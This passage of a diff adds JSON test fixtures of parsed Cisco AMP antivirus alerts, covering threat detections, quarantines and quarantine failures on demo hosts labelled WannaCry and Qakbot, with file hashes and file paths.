"cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + 
"event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 2379, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847661", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 3572, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": 
"cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847659", + "cisco.amp.error.description": "Cannot delete", + "cisco.amp.error.error_code": 3221225761, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 4765, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847657", + "cisco.amp.error.description": 
"Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 5950, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229331435814973", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 572000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + 
"file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 7136, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419229331435814969", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 120000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": 
"u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 8409, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 1008, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229331435814970", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 73000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": 
"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 9938, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419229331435814968", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 26000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + 
"input.type": "log", + "log.offset": 11210, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847660", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 12488, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847658", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 13608, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229322845880359", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, 
+ "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 14728, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229327140847671", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 870000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 15848, + 
"related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419229327140847666", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 698000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 17121, + "process.hash.md5": "ad7b9c14083b52bc532fba5948342b98", + "process.hash.sha1": 
"ee8cbf12d87c4d388f09b4f69bed2e91682920b5", + "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "process.name": "cmd.exe", + "process.pid": 5748, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419229327140847665", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 667000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": 
"Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 18745, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 4772, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419229327140847656", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 28000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": 
"Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 20287, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411488666497056775", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 913000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 
23391, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411488666497056774", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 913000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 24592, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
